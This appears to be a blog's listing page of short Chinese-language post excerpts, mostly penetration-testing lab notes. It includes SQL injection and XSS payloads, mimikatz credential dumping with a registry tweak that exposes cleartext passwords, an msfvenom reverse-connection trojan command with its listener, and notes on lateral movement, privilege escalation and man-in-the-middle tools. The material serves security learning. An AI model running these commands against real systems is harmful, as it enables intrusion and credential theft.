- 博客(78)
- 收藏
- 关注
原创 pdfplumber 使用报错‘lchar‘ object has no attribute ‘graphicstate‘
一个是版本问题 换个版本。这个傻吊问题两个原因。
2024-06-16 20:38:04 123
原创 portswigger使用未键入的 cookie 进行 Web 缓存中毒
我的理解是:1 页面能缓存,能被其他人访问2 存在一个参数被用户控制且同时缓存在页面中(不仅仅是cookie)观察页面,发现cookie中参数fehost会回显在响应包中且存在缓存所以我们去尝试更改fehost的值,看页面是否会连同该值一起缓存刷新页面,发现会缓存,我们可以闭合引号构造xss然后刷新页面,成功执行xss...
2022-03-30 11:52:54 276
原创 portswigger带有未键标头的 Web 缓存中毒理解
1进入实验室https://portswigger.net/web-security/web-cache-poisoning/exploiting-design-flaws/lab-web-cache-poisoning-with-an-unkeyed-header2抓包,刷新页面,在响应包里,我们注意到X-Cache标头该标头反应的是,缓存是否被名中(从HTTP响应头看各家CDN缓存技术)via ,x-cache,X-Cache-Lookup,X-Via,X-Via-CDN,Vip-Ca
2022-03-30 11:09:40 396
原创 MyDriver1.inf : error 1297: Device driver does not install on any devices, use primitive driver if t
要解决该问题,只需inf从 Visual Studio 中删除该文件并重新编译即可
2021-12-01 10:05:12 4361
原创 centos升级jdk8到11
查看当前java版本java -version查看jdk名称rpm -qa | grep jdk卸载jdkrpm -e --nodeps jdk1.8-1.8.0_xxxxxxxx安装新版本yum install java-11-openjdk* -y
2021-11-26 14:06:59 2594
原创 MTU从网络接口传输的数据包的最大大小
查看当前mtu大小ifconfig | grep mtu或者ip a | grep mtu临时更改mtu大小(默认大小为1500)ifconfig < Interface_name > mtu < mtu_size > up或者ifconfig < Interface_name > mtu < mtu_size >ifconfig tun0 mtu 1200...
2021-11-20 16:33:46 2139
原创 验证码识别-使用tesseract
tesseract的windows版本下载地址https://github.com/UB-Mannheim/tesseract/wiki下面是自动读取Web For Pentester II中的Captcha 第六关的python代码#需要安装tesseractfrom PIL import Imagefrom urllib.error import *from urllib.request import *from urllib.parse import *import subproce
2021-11-05 10:29:46 299
原创 pentesterlab-xss
第一关http://192.168.1.142/xss/example1.php?name=hacker观察到url参数在页面显示,尝试xsshttp://192.168.1.142/xss/example1.php?name=hacker 成功第二关去掉了script可以使用大小写绕过,也可以使用其他语句绕过使用大小写绕过192.168.1.142/xss/example2.php?name=hacker<Script>alert(1)</Script>递归方法
2021-11-02 21:31:07 2990
原创 pentesterlab-sql
第一关http://192.168.1.142/sqli/example1.php?name=root有可见传递参数,测试是否存在注入http://192.168.1.142/sqli/example1.php?name=root’ 报错即存在注入pyaloadhttp://192.168.1.142/sqli/example1.php?name=root' order by 1 %23http://192.168.1.142/sqli/example1.php?name=root%27uni
2021-11-02 21:18:44 329
原创 用burpsuite进行 basic Authentication爆破
第一步抓包把Basic 后面的密文进行解码YWRtaW46YWRtaW4=使用Base64进行解码 发现格式为 admin:admin然后使用burp里面的intruder模块进行爆破首先设置payload的位置第二步设置payloads原始的格式是 admin:admin我们应该将这个分为三部分第一部分 username admin第二部分 :第三部分 password admin在设置payload的时候 我们也应该对应设置payload类型我们设置为cust.
2021-10-29 16:43:28 1828
原创 使用dnsmasq让本地hosts泛解析
dnsmasq下载地址:https://github.com/felixonmars/dnsmasq-china-listDNSmasq是一个小巧且方便地用于配置DNS和DHCP的工具,适用于小型网络,它提供了DNS功能和可选择的DHCP功能。 它服务那些只在本地适用的域名,这些域名是不会在全球的DNS服务器中出现的kali安装dnsmasqapt-get install dnsmasq在hosts文件中,没有通配符的概念(即泛解析),所以需要我们一个ip对应一个域名,如果要一个ip要对应多个子域
2021-10-04 21:40:22 5811
原创 raise JSONDecodeError(“Expecting value“, s, err.value) from None json.decoder.JSONDecodeError: Expec
我出现这个问题的原因是传递给json.loads的数据不符合json格式引起的strapiVersion = json.loads(s.get("{}/admin/strapiVersion".format(strapiUrl)).text)这样直接传递就会报错raise JSONDecodeError(“Expecting value”, s, err.value) from Nonejson.decoder.JSONDecodeError: Expecting value: line 1 c
2021-10-03 16:47:53 8842
原创 kali中无法使用apt-get
出现上述问题解决办法:第一步cd /etc/apt/ #进入该目录检查是否存在sources.list ,如果不存在,就自己新建一个,里面内容是kali的镜像源,自己网上搜#如果有类似 【sources.list~】 ,这种跟sources.list 混淆的文件,把它删除第二步vim /etc/apt/sources.list #进入该文件,检查镜像源是否正确 ,格式是否正确...
2021-09-25 16:14:37 1102
原创 kali安装python2、python3以及对应的pip
kali自带python2python --version #查看python版本安装pipwget https://bootstrap.pypa.io/pip/2.7/get-pip.py #下载pippython get-pip.py #安装pippython -m pip -V #查看安装pip的版本
2021-09-25 10:35:49 2008 1
原创 burpsuite配置
设置字体大小User options>display>font size抓包端口设置proxy>options>add浏览器设置firefox添加组件proxyswitchyomega配置proxyswitchyomega添加证书进入http://burp ,下载证书重要:下载的证书后缀是der 要改成cer导入证书setting>preferences>privacy>certificates>view certific
2021-09-24 22:49:43 314
原创 kali linux复制粘贴快捷键
在终端下:复制命令:Ctrl + Shift + C粘贴命令:Ctrl + Shift + V在控制台下:复制命令:Ctrl + Insert 或 用鼠标选中即是复制粘贴命令:Shift + Insert 或 单击鼠标滚轮即为粘贴命令模式(能复制很多东西)命令模式就是在你所处的任意模式按ESC键,都可以会到命令行模式,Ctrl+C 复制Ctrl+V 粘贴Ctrl+X 剪切Ctrl+D删除Ctrl快捷键Ctrl+S保存Ctrl+W关闭程序Ctrl+N新建Ctrl+O打开Ct
2021-09-24 17:05:23 8688
原创 ssh免密码连接ubuntu
在本机生成ssh公钥ssh-keygen -t rsa密码可以设置,也可以不设置,我们要复制公钥。cd /root/.ssh/ #进入id_rsa.pub 所在的目录cat id_rsa.pub #打开id_rsa.pub 复制公钥将公钥保存到目标机的authorized_keys里面(不同的linux系统 authorized_keys的位置不太一样)/home/ubuntu/.ssh #ubuntu的位置echo 'ssh-rsa AAAAB3NzaC1yc
2021-09-21 12:57:55 378
原创 mimikatz配合procdump抓取密码
0x01 获取本地帐户密码1.1 本地执行下载mimikatz程序,找到自己系统对应的位数,右键以管理员身份运行:(不是管理员会报错)#提升权限privilege::debug#抓取密码sekurlsa::logonpasswords当目标为win10或2012R2以上时,默认在内存缓存中禁止保存明文密码,但可以通过修改注册表的方式抓取明文。cmd修改注册表命令:reg add HKLM\SYSTEM\CurrentControlSet\Control\SecurityProvider
2021-09-16 10:04:58 3992
原创 wmic横向
WMI,是Windows 2K/XP管理系统的核心;对于其他的Win32操作系统,WMI是一个有用的插件。WMI以CIMOM为基础,CIMOM即公共信息模型对象管理器(Common Information Model Object Manager),是一个描述操作系统构成单元的对象数据库,为MMC和脚本程序提供了一个访问操作系统构成单元的公共接口。有了WMI,工具软件和脚本程序访问操作系统的不同部分时不需要使用不同的API;相反,操作系统的不同部分都可以插入WMI。使用 wmic 远程执行命令,在远程系.
2021-09-15 18:39:37 195
原创 impacket安装
下载地址:https://github.com/SecureAuthCorp/impacket.gitImpacket 是一组用于处理网络协议的 Python 类。用于对SMB1-3或IPv4 / IPv6 上的TCP、UDP、ICMP、IGMP,ARP,IPv4,IPv6,SMB,MSRPC,NTLM,Kerberos,WMI,LDAP等协议进行低级编程访问。具体协议如下Ethernet, Linux “Cooked” capture.IP, TCP, UDP, ICMP, IGMP, ARP.
2021-09-15 18:38:26 3517
原创 windows在cmd中使用wmic
windows 10 自带有wmic1 找到wmic的位置C:\Windows\System32\wbem2 添加到环境变量里我的电脑>属性>高级系统设置>高级>环境变量>找到系统变量path>编辑>将wmic的路径添加进去3重启电脑
2021-09-14 19:24:36 823
原创 psexec
psexec 是 windows 下非常好的一款远程命令行工具。psexec的使用不需要对方主机开方3389端口,只需要对方开启admin$共享 (该共享默认开启)。但是,假如目标主机开启了防火墙,psexec也是不能使用的,会提示找不到网络路径。由于psexec是Windows提供的工具,所以杀毒软件将其列在白名单中。但是PsExec在内网中大杀四方后,很多安全厂商开始将PsExec加入了黑名单下载地址:https://docs.microsoft.com/zh-cn/sysinternals/dow.
2021-09-14 17:00:06 3993
原创 ipc$连接+计划任务
IPC$(Internet Process Connection) 是为了让进程之间通信的一种“管道”,通过提供用户名密码建立了一条安全的、加密的、用于数据交换的通道。关于IPC$+计划任务的横向,我们的目的非常明确:(1)首先建立向目标主机的IPC$连接(2)其次把命令执行的脚本传到目标主机(3)再次创建计划任务在目标机器上执行命令脚本(4)最后过河拆桥删除IPC$连接当然想要用IPC$来横向是有条件的:(1)目标机器没有禁用IPC连接,没有什么防火防盗拦截IPC连接,没有什么防火防盗拦.
2021-09-14 14:49:45 3992 2
原创 dirtycow脏牛提权
漏洞范围:Linux内核 >= 2.6.22(2007年发行,到2016年10月18日才修复)以下是主流发行版修复之后的内核版本,如果你的内核版本低于列表里的版本,表示还存在脏牛漏洞Centos7 /RHEL7 3.10.0-327.36.3.el7Cetnos6/RHEL6 2.6.32-642.6.2.el6Ubuntu 16.10 4.8.0-26.28Ubuntu 16.04 4.4.0-45.66Ubuntu 14.04
2021-09-12 15:08:34 883
原创 eclipse中将springboot项目打成jar包并部署
导入项目1.右击项目,选择Run As - Maven clean2.右击项目,选择Run As - Maven install3.成功后 会在项目的target文件夹下生成jar包4.将打包好的jar包 发布到服务器,运行java -jar jar包5.或者使用命令nohup java -jar jar包,nohup命令可以后台启动jar,如果 直接运行 java -jar 则关闭终端,spring的进程也会关闭。jar包方式启动,也就是使用spring boot内置的tomcat运
2021-09-11 15:15:31 2337 1
原创 windows查看系统补丁
一:systeminfo 二:wmic qfe get caption,description,hotfixid,installedon
2021-09-09 19:36:34 1094
原创 kerberos提权
use incognitolist_tokens -u#显示可用的token可以看见我们已经获取了一个系统管理员的授权令牌WIN-GMDFGOL4157\Administratorimpersonate_token WIN-GMDFGOL4157\\Administrator#在incognito中调用impersonate_token命令假冒administrator用户进行攻击(注意在输入token时 中间是两个反斜杠 impersonate_token WIN-GMDFGOL41
2021-09-09 19:21:10 130
原创 msf进程迁移
在msf拿到会话后getuid #查看当前用户 ps #获取目标主机正在运行的进程getpid #查看meterpreter shell的进程号然后使用migrate 1692命令将shell移到PID为1692的explorer.exe进程里,因为该进程是一个稳定的应用。migrate 1692 #迁移进程再次查看进程发现已经改变进程迁移后 原来的pid的2496会自动关闭,如果没有关闭输入 kill 2496 关闭进程kill 2496 #关闭进程run post
2021-09-09 13:29:28 3850 1
原创 metasploit常用扫描模块及功能
模块功能auxiliary/scanner/portscan端口扫描auxiliary/scanner/smb/smb_versionSMB系统版本扫描auxiliary/scanner/smb/smb_enumusersSMB枚举auxiliary/scanner/smb/smb_loginSMB弱口令扫描auxiliary/admin/smb/psexec_commandSMB登录且执行命令auxiliary/scanner/ssh/ssh_l...
2021-09-09 09:16:46 592
原创 kali更新命令
apt-get update #只更新软件包的索引源,作用是同步源的软件包的索引信息,从而进行软件更新apt-get upgrade #升级系统上安装的所有软件包,若更新失败,所涉及的包会保持更新之前的状态apt-get dist-upgrade #升级整个linux系统(不仅能够升级所有已安装的软件包,而且会处理升级过程中可能会出现的软件冲突。某些情况下,它的部分升级过程需要人工参与)apt-get install soft_name #安装软件...
2021-09-09 08:44:08 3157
原创 hashcat简单使用
hashcat是世界上最快、最先进的密码恢复实用程序,支持针对 300 多种高度优化的哈希算法的五种独特攻击模式。hashcat 目前支持 Linux、Windows 和 macOS 上的 CPU、GPU 和其他硬件加速器,并具有帮助启用分布式密码破解的工具。-h #查看使用-m #指定hash类型-a #攻击模块hashcat -m 5600 w::DESKTOP-75AQPA5:2ce8cf18e7c62a8b:304F04A46CF0F3249E628FB0F64D1D6F:01010000
2021-09-08 18:44:42 2334
原创 responder简单用法
Responder is an LLMNR, NBT-NS and MDNS poisoner. It will answer to specific NBT-NS (NetBIOS Name Service) queries based on their name suffixResponder 是一款可以在局域网模拟各种服务器的内网渗透神器其可以在局域网中进行 DNS 欺骗、LLMNR 欺骗等,实现对用户 NTLM 口令的探测以及 DNS 钓鱼同时其还可以模拟包括 FTP、HTTP 在内的多
2021-09-08 14:35:57 1506
原创 msf生成简单木马
windows 木马msfvenom -p windows/meterpreter/reverse_http lhost=192.168.1.128 lport=6666 SessionCommunicationTimeout=0 SessionExpirationTimeout=0 -f exe>shell.exe监听msfconsoleuse exploit/multi/handlerset payload windows/meterpreter/reverse_https
2021-09-04 18:53:31 337
原创 bettercap
Bettercap是一个非常强大、灵活可移植的中间人攻击框架,它具有跨平台、轻量级以及模块化等优点,在渗透测试过程中能够非常好的进行中间人测试。 在Kali Linux上可以通过apt install bettercap直接安装实验环境:攻击机kali :192.168.1.128win7:192.168.1.133网关:192.168.1.2kali安装:apt-get install bettercap 最新版本的有点问题 【版本你自己选】apt-cache madison soft_
2021-08-24 22:05:02 2681
原创 sslstrip安装
SSLStrip 攻击SSLstrip 也叫 https 降级攻击,攻击者拦截用户流量后,欺骗用户与攻击者进行 http 通信,攻击者与服务器保持正常通信 (http 或 https),从而获取用户信息。攻击原理 通过中间人攻击监听 http 流量(自己试验可以通过设置 http 代理) 更改重定向链接中的 location,替换 https 为 http,并记录 更改响应内容中的超链接,替换 https 为 http,并记录 与用户进行 http 通信,与服务器进行 https 通信(记录中本应是 h
2021-08-22 10:15:33 1945 1
空空如也
空空如也
TA创建的收藏夹 TA关注的收藏夹
TA关注的人